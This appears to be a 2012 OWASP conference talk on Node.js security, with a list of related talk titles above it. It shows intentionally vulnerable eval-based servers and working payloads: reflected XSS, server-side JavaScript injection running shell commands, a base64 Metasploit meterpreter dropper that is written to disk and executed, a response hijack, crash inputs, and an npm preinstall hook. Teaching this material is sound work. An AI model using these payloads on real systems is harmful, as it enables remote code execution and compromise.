Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 

Node.js Security Talk Covers Old Vulnerabilities

  • 1. Node.js Security" Old vulnerabilities in new dresses Application Security Forum Western Switzerland 2012 November 8th 2012 Sven Vetsch Redguard AG sven.vetsch@redguard.ch www.redguard.ch @disenchant_ch / @redguard_ch Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this The OWASP Foundation document under the terms of the OWASP License. http://www.owasp.org
  • 2. Sven Vetsch §  Partner & CTO at Redguard AG §  www.redguard.ch §  Specialized in Application Security §  (Web, Web-Services, Mobile, …) §  Leader OWASP Switzerland §  www.owasp.org / www.owasp.ch sven.vetsch@redguard.ch Twitter: @disenchant_ch / @redguard_ch 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 2
  • 3. Table of Contents I.  Node.js II.  Node.js Security III.  Wrap Up IV.  Q & A 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 3
  • 4. Remarks Don’t use any of the code shown in this presentation unless you want to write insecure software! We won’t really go into how to avoid and fix things. You will see, that we’ll just talk about new possibilities on exploiting well-known vulnerabilities anyway. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 4
  • 5. I Node.js JavaScript on your Server 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 5
  • 6. Wait what…? §  Node aka. Node.js §  Open Source (http://nodejs.org/) §  Platform built on Google's JavaScript runtime (V8) §  For easily building fast and scalable network applications §  Node uses an event-driven, non-blocking I/O model §  Lightweight and efficient - perfect for data-intensive real-time applications that run across distributed devices. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 6
  • 7. Node.js Processing Model © by Aaron Stannard 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 7
  • 8. In short… “Node allows JavaScript to be executed server-side and provides APIs (i.e. to work with files and talk to devices on a network).” 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 8
  • 9. Who would use this? 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 9
  • 10. Hello World var http = require('http'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/plain’ }); res.end('Hello Worldn'); }).listen(1337, '127.0.0.1'); console.log('Server running at http:// 127.0.0.1:1337/'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 10
  • 11. Working with (GET) Parameters var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query; var name = queryData.name; console.log("Hello " + name); res.end("Hello " + name); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 11
  • 12. Working with (GET) Parameters var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query; var name = queryData.name; console.log("Hello " + name); res.end("Hello " + name); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 12
  • 13. Funfact Using %07 (BEL character) your machine goes bing
  • 14. II Node.js Security 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 14
  • 15. So you’re saying … var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query; var name = queryData.name; console.log("Hello " + name); res.end("Hello " + name); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 15
  • 16. Reflecting XSS http://example.com/? name=<script>alert(1);</script> 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 16
  • 17. Server Side JavaScript Injection §  It’s much like DOM-based XSS and all the know sources and sinks also work on Node. §  http://code.google.com/p/domxsswiki/wiki/Index §  Interesting is everything that performs an eval() §  eval() is (and stays) evil 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 17
  • 18. Server Side JavaScript Injection Be serious, who would use eval() or for example let unchecked code reach a setTimeout()? 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 18
  • 19. Server Side JavaScript Injection §  Github returns 444’932 when searching for “eval” in JavaScript code. §  Of course not all of those are in fact insecure usages of the eval() function 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 19
  • 20. Server Side JavaScript Injection §  Another example: How do you convert JSON back to an object? §  The good answer: JSON.parse(str); §  The bad (but easier and more intuitive) answer: eval(str); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 20
  • 21. Server Side JavaScript Injection §  “First, you'll use a JavaScript eval() function to convert the JSON string into JavaScript objects.” return eval(json); (https://developers.google.com/web-toolkit/doc/latest/tutorial/JSON) 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 21
  • 22. Server Side JavaScript Injection §  “With JSON, you use JavaScript's array and object literals syntax to define data inside a text file in a way that can be returned as a JavaScript object using eval().” var jsondata = eval("("+mygetrequest.responseText+")") (http://www.javascriptkit.com/dhtmltutors/ajaxgetpost4.shtml) 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 22
  • 23. (Ab)using JSON ... var queryData = url.parse(req.url, true).query; if (queryData.jsonString) { var jsonObject = eval('(' + queryData.jsonString + ')'); res.end(jsonObject.order[0].name+" ordered one " +jsonObject.order[0].beer); } else { res.end("Please place your order."); } }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 23
  • 24. (Ab)using JSON http://example.com/?jsonString={"order": [{"name":"John","beer":"Murphy’s Red"}]} And because of: eval('(' + queryData.jsonString + ')'); http://example.com/?jsonString={"order": [{"name":"John”,"beer":console.log(1)}]} 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 24
  • 25. Code Execution var http = require('http'); var url = require('url'); http.createServer(function (req, res) { var queryData = url.parse(req.url, true).query; eval("console.log('"+queryData.log+"')"); res.writeHead(200, { 'Content-Type': 'text/plain’ }); res.end('Hello Worldn'); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 25
  • 26. Code Execution var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } Exec("ls -lah", puts); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 26
  • 27. Code Execution http://example.com/?log=1');var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } exec("ls -lah", puts);// 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 27
  • 28. Metasploit meterpreter http://example.com/?log=1');var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } exec("echo 'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAA AAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECAC ABAibAAAA4gAAAAcAAAAAEAAAMdv341NDU2oCsGaJ4c2 Al1towKgOAWgCAB %2bQieFqZlhQUVeJ4UPNgLIHuQAQAACJ48HrDMHjDLB9 zYBbieGZtgywA82A/%2bE=' | base64 -d > x; chmod 777 x; ./x;", puts);// 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 28
  • 29. Hijack Response http://example.com/?log=1');var orig = http.ServerResponse.prototype.write; function newWrite (chunk) {orig.call(this, chunk%2b' hijacked');} http.ServerResponse.prototype.write = newWrite;// 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 29
  • 30. Funfact An unhandled exception crashes your server.
  • 31. Simple Crash Demo var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/html'}); var queryData = url.parse(req.url, true).query; var number_of_decimals = 1; if (queryData.nod) {number_of_decimals = queryData.nod;} res.end( Math.PI.toFixed(number_of_decimals).toString() ); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 31
  • 32. Simple Crash Demo var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/html'}); var queryData = url.parse(req.url, true).query; var number_of_decimals = 1; if (queryData.nod) {number_of_decimals = queryData.nod;} res.end( Math.PI.toFixed(number_of_decimals).toString() ); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 32
  • 33. Simple Crash Demo number.toFixed( [digits] ) §  digits The number of digits to appear after the decimal point; this may be a value between 0 and 20, inclusive, and implementations may optionally support a larger range of values. If this argument is omitted, it is treated as 0. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 33
  • 34. Simple Crash Demo http://example.com/?nod=-1 ... or ... http://example.com/?nod=21 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 34
  • 35. Does Node.js support… Sessions   NO   Permanent  Data  Storage   NO   Caching   NO   Database  Access   NO   Logging   NO   Default  Error  Handling   NO   …   Most  likely  NO   8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 35
  • 36. npm - Node Packaged Modules §  npm is a Node.js package manager §  https://npmjs.org/ §  De-facto standard §  Open – everyone can publish packages 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 36
  • 37. npm - Node Packaged Modules §  npm init §  Edit package.json like we’ll see in a second §  npm pack §  npm install evilModule-1.2.3.tgz §  Publish J 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 37
  • 38. npm - Node Packaged Modules { "author": "Sven Vetsch", "name": "evilModule", "version": "1.2.3", "scripts": { "preinstall": "ls -lah; whoami" } } 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 38
  • 39. III Wrap Up 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 39
  • 40. Wrap Up §  Using Node.js can be a good thing but you §  have to care about a lot of things §  know the modules you can use §  need to write a lot of code yourself until someone writes a module for it §  We have to wait for (and help) improve modules that make Node.js applications more secure. §  Training for developers is key as they can’t write secure Node.js application without even understanding the most simple XSS vectors. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 40
  • 41. IV Q & A sven.vetsch@redguard.ch @disenchant_ch / @redguard_ch 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 41